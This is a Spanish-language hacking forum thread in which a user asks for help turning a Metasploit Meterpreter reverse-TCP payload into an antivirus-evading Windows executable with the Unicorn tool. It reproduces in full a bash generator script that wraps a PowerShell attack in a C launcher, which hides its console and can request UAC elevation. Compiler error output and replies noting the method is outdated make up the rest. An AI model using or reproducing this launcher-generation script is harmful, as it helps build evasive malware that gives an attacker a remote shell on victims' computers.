Sólo texto | Texto con Imágenes

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: redferne en Mayo 29, 2017, 04:41:42 AM

Título: [SOLUCIONADO] unicorn, problema al compilar payload
Publicado por: redferne en Mayo 29, 2017, 04:41:42 AM
salud:
siguiendo las indicaciones de "antrax" para compilar un payload con "unicorn"

https://underc0de.org/foro/malware/evadiendo-antivirus-con-unicorn/?action=post;last_msg=115292
(https://underc0de.org/foro/malware/evadiendo-antivirus-con-unicorn/?action=post;last_msg=115292)
consigo llegar hasta la compilacion online  pero me da un error  os pongo lo que sale....al crear el payload con el "unicorn" obtengo este mensaje

Código (text) [Seleccionar]

Unicorn Powershell2C code generator 
Works for Vista, Win7, Win8 32/64 bit
--------------------------------------
Generating nonUAC unicorn.c ...
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Length of shellcode was not generated. Check payload name and if Metasploit is working and try again.
Exiting....
cat: powershell_attack.txt: No existe el fichero o el directorio
./Unicornio.sh: línea 35: todos: no se encontró la orden
[*] Exported unicorn.c To compile use cl.exe unicorn.c

   



luego abro el arhivo "unicornio.c" con el leafpad copio lo que hay  lo pego en la pagina le doy a compilar en C++ para windows yme arroja este error, y no me genera ningun "xxxxxx.exe" ,me genera un "xxxx.c" las paginas que uso son
Código [Seleccionar]
http://www.onlinecompiler.net/ccplusplus
https://ideone.com/]
http://www.onlinecompiler.net/ccplusplus
https://ideone.com/


Código (text) [Seleccionar]

Filename: jr9Ir7tv Compiler Return Value: 1 Compiler Output:
jr9Ir7tv.c:5:20: fatal error: aclapi.h: No such file or directory
#include
^
compilation terminated.

Link to source file: jr9Ir7tv.c COULD NOT SUCCESSFULLY COMPILE! BACK


Título: Re:unicorn, problema al compilar payload
Publicado por: zoro248 en Mayo 30, 2017, 02:41:09 PM
Ahora el proceso de generar el Payload es con Python, ve a la Githun del autor, y cambia un poco el funcionamiento pero es igual de efectivo

Código [Seleccionar]
https://astr0baby.wordpress.com/2013/06/20/unicorn-2-c-source-generator/

Saludos!
Título: Re:unicorn, problema al compilar payload
Publicado por: redferne en Mayo 31, 2017, 03:26:02 AM
En su web tiene este código para luego compilar un XxX.exe ,este es el código

Código (python) [Seleccionar]
#!/bin/bash
clear
echo '--------------------------------------'
echo ' Unicorn Powershell2C code generator  '
echo 'Works for Vista, Win7, Win8 32/64 bit'
echo '--------------------------------------'
if [ -z "$*" ];then 
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac uac'
exit 0
fi
case $4 in
nonuac)
echo 'Generating nonUAC unicorn.c ...'
python unicorn.py $1 $2 $3 
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c 
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c 
echo -n ' ShellExecute( NULL,NULL, "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
todos unicorn.c
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.c'
;;

uac)
echo 'Generating UAC  unicorn.c ...'
python unicorn.py $1 $2 $3
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL, "runas", "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
todos unicorn.c
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.'
;;

"")
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac, uac'
exit 0
;;
esac

Ese código lo pego en un compilar online formato salida C++ y me da el error que comento, no genera un XxX.exe genera un XxX.c
He actualizado Python ,he probado con otras distribuciones....Y sigue igual, así que por eso pregunto si ese código funciona.
Título: Re:unicorn, problema al compilar payload
Publicado por: zoro248 en Mayo 31, 2017, 01:56:23 PM
Al parecer ese codigo no funciona, el autor ahora genera los "indetectables" de otra manera, y utiliza una herramienta en Python, ya no sigas peleando con ese codigo xD
Título: Re:unicorn, problema al compilar payload
Publicado por: redferne en Mayo 31, 2017, 03:49:59 PM
Ok, a otra cosa entonces
Sólo texto | Texto con Imágenes